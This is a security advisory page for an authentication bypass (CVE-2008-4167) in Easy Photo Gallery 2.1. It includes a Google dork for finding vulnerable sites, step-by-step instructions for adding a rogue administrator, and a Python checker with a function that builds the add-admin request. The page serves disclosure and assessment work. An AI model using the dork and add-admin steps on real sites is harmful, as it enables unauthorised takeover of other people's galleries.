Easy Photo Gallery 2.1 Arbitrary Add Admin / remove user Vulnerability

Published: 2008.09.23
Credit: Stack
Risk: Medium
CWE: CWE-287
CVE: CVE-2008-4167
Local: No
Remote: Yes
Dork: "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="

CVSS Base Score: 6.4/10
Impact Subscore: 4.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: Partial

#----------------------------------------------------------------
#
#Script : Ezphotogallery 2.1
#
#Type : Vulnerabilities ( Add Admin user/Remove user)
#
#Google Dork : "100% | 50% | 25%" "Back to gallery" inurl:"show.php?imageid="
#
#----------------------------------------------------------------
#
#Discovered by : Stack
#
#----------------------------------------------------------------
#
#Script Download : http://heanet.dl.sourceforge.net/sourceforge/ezphotogallery/ezphotogallery-2.1.zip
#
#----------------------------------------------------------------

Exploit :
http://site.il/useradmin.php

useradmin.php can be requested directly, without logging in: the script does not verify that the visitor holds an authenticated administrator session (CWE-287), so its Add user and Remove user forms are served to any remote client that can reach the URL. The fix is to require a valid administrator session before the page renders anything.

How to use the exploit:
Open useradmin.php and fill in the Add user form.
----------------------------------------
Simple example by Stack user :d :d
----------------------------------------
Add user
Name: Stack
Password: passstack
E-mail: Stack@hotmail.fr
Private: yes or no
Administrator: yes
The user Stack is now an administrator.
----------------------------------------
Remove user
User: choose the user and click Remove.
----------------------------------------
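The following script is an added example, not code from the original advisory or from ezphotogallery itself. It checks whether a given install serves the useradmin.php user-management forms to an anonymous client (the condition the advisory describes) and builds the Add user request with Administrator set. The POST field names (name, password, email, private, admin) are assumptions: the advisory only gives the form labels, not the HTML input names, so adjust them to the real form before use. The sample HTML bodies are constructed so the classifier can be exercised offline.

```python
"""
Check whether an Easy Photo Gallery (ezphotogallery) 2.1 install exposes
useradmin.php to unauthenticated clients (CVE-2008-4167, CWE-287).

Added example, not part of the original advisory or the product.
ASSUMPTIONS: the POST field names below are illustrative; the advisory only
gives the form labels (Name, Password, E-mail, Private, Administrator), not
the HTML input names. Sample responses are constructed for offline testing.
"""
import re
import urllib.error
import urllib.parse
import urllib.request

# Constructed sample bodies (not captured from a real site).
SAMPLE_EXPOSED = """<html><body>
<h2>Add user</h2>
<form method="post" action="useradmin.php">
Name: <input name="name"> Password: <input name="password">
E-mail: <input name="email"> Private: <input type="checkbox" name="private">
Administrator: <input type="checkbox" name="admin">
<input type="submit" value="Add">
</form>
<h2>Remove user</h2>
<form method="post" action="useradmin.php">
User: <select name="user"><option>stack</option></select>
<input type="submit" value="Remove">
</form></body></html>"""

SAMPLE_LOGIN = """<html><body><h2>Login</h2>
<form method="post" action="login.php">
Name: <input name="name"> Password: <input name="password">
</form></body></html>"""

# Status codes that mean the page bounced or refused an anonymous visitor.
PROTECTED_STATUSES = {301, 302, 303, 307, 308, 401, 403}


def classify_response(status, body):
    """Classify an anonymous GET of useradmin.php.

    'protected' - redirected (typically to a login page) or refused outright
    'exposed'   - the user-management forms were served to an anonymous client
    'unknown'   - anything else (a login form on 200, a 404, an error page)
    """
    if status in PROTECTED_STATUSES:
        return "protected"
    if status != 200:
        return "unknown"
    text = re.sub(r"\s+", " ", body).lower()
    # Both forms named in the advisory must be present, plus the privilege
    # control that makes the Add user form dangerous.
    if "add user" in text and "remove user" in text and "administrator" in text:
        return "exposed"
    return "unknown"


def build_add_admin_post(name, password, email, private=False):
    """Return (path, urlencoded body) for the Add user form with Administrator=yes.

    Field names are ASSUMED for illustration; adjust them to the real form's
    input names before use.
    """
    fields = {
        "name": name,
        "password": password,
        "email": email,
        "private": "1" if private else "0",
        "admin": "1",
    }
    return "useradmin.php", urllib.parse.urlencode(fields)


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface a 3xx as HTTPError instead of silently following it to a login page."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_status_and_body(url, timeout=10):
    """Anonymous GET returning (status, body) without following redirects."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": "ezpg-check/1.0"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def check_install(base_url, timeout=10):
    """Return the classification for base_url + useradmin.php."""
    url = urllib.parse.urljoin(base_url.rstrip("/") + "/", "useradmin.php")
    status, body = fetch_status_and_body(url, timeout)
    return classify_response(status, body)


if __name__ == "__main__":
    import sys
    # Offline demonstration on the constructed samples, then an optional live check.
    print("exposed sample ->", classify_response(200, SAMPLE_EXPOSED))
    print("login sample   ->", classify_response(200, SAMPLE_LOGIN))
    print("redirect       ->", classify_response(302, ""))
    if len(sys.argv) > 1:
        print(sys.argv[1], "->", check_install(sys.argv[1]))
```

Run it with no arguments to see the classifier on the constructed samples, or pass a gallery base URL to test a host you are authorised to assess. A "protected" result only means the anonymous request was redirected or refused; it does not prove the forms are also protected against a logged-in non-admin user, which the advisory does not address.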

References:

http://xforce.iss.net/xforce/xfdb/45119
http://www.securityfocus.com/bid/31161
http://www.milw0rm.com/exploits/6437

Copyright 2014, cxsecurity.com